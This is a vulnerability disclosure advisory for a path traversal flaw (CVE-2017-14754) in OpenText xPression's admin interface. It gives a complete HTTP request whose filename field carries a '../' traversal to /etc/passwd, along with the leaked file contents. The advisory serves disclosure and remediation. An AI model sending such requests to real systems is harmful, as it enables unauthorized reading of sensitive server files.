OpenText Document Sciences xPression 4.5SP1 Patch 13 Arbitrary File Read

2017-09-29T00:00:00
ID PACKETSTORM:144393
Type packetstorm
Reporter Mariusz Woloszyn
Modified 2017-09-29T00:00:00

Description

                                        
                                            `Title: OpenText Document Sciences xPression (formerly EMC Document  
Sciences xPression) - Arbitrary File Read  
Author: Marcin Woloszyn  
Date: 27. September 2017  
CVE: CVE-2017-14754  
  
Affected Software:  
==================  
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)  
  
Exploit was tested on:  
======================  
v4.5SP1 Patch 13 (older versions might be affected as well)  
  
Arbitrary File Read:  
====================  
  
Authenticated user is able to read arbitrary system file due to path  
traversal issue.  
  
Vector :  
--------  
  
1) visit https://[...]/xAdmin/html/cm_datasource_summary.jsp and  
select data source  
  
2) modify and save datasource. xsd_datasource_schema_file parameter  
filename is vulnerable:  
  
POST /xAdmin/html/cm_datasource_group_xsd.jsp?action=get_schema_m HTTP/1.1  
Host: [...]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://[...]/xAdmin/html/cm_datasource_group_dispatcher.jsp?action=modify&refresh=yes&group_name=%43%75%73%74%6f%6d%65%72%58%58%45%74%65%73%74%27  
Cookie: JSESSIONID=[...]; hideHeaderAndFooter=false  
Connection: close  
Content-Type: multipart/form-data;  
boundary=---------------------------11140219741229998994791588049  
Content-Length: 1472  
  
-----------------------------11140219741229998994791588049  
Content-Disposition: form-data; name="xsd_datasource_group_id"  
  
301  
-----------------------------11140219741229998994791588049  
Content-Disposition: form-data; name="group_name"  
  
aaa  
-----------------------------11140219741229998994791588049  
Content-Disposition: form-data; name="group_name_old"  
  
aaa  
-----------------------------11140219741229998994791588049  
Content-Disposition: form-data; name="xsd_datasource_schema_source"  
  
fromServer  
-----------------------------11140219741229998994791588049  
Content-Disposition: form-data; name="xsd_datasource_schema_location"  
  
aaa.xml  
-----------------------------11140219741229998994791588049  
Content-Disposition: form-data; name="xsd_datasource_schema_file";  
filename="../../../../../../../../../../../../../../../../etc/passwd"  
Content-Type: application/octet-stream  
  
  
-----------------------------11140219741229998994791588049  
Content-Disposition: form-data; name="delimiter_xpath"  
  
e  
-----------------------------11140219741229998994791588049  
Content-Disposition: form-data; name="customer_key_xpath"  
  
e  
-----------------------------11140219741229998994791588049  
Content-Disposition: form-data; name="xsd_datasource_schema"  
  
<?xml version="1.0" ?>  
<aaa></aaa>  
  
-----------------------------11140219741229998994791588049--  
  
In response, file contents are returned:  
  
HTTP/1.1 200 OK  
[...]  
  
<TEXTAREA name="xsd_datasource_schema" cols="10" rows="20"  
class="largeoption"  
readonly="readonly">root:x:0:0:[...]:/root:/bin/bash  
bin:x:1:1:[...]:/bin:/sbin/nologin  
daemon:x:2:2:[...]:/sbin:/sbin/nologin  
adm:x:3:4:[...]:/var/adm:/sbin/nologin  
sync:x:5:0:[...]:/sbin:/bin/sync  
shutdown:x:6:0:[...]:/sbin:/sbin/shutdown  
[...]  
  
Fix:  
====  
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774  
  
Contact:  
========  
mw[at]nme[dot]pl  
  
  
`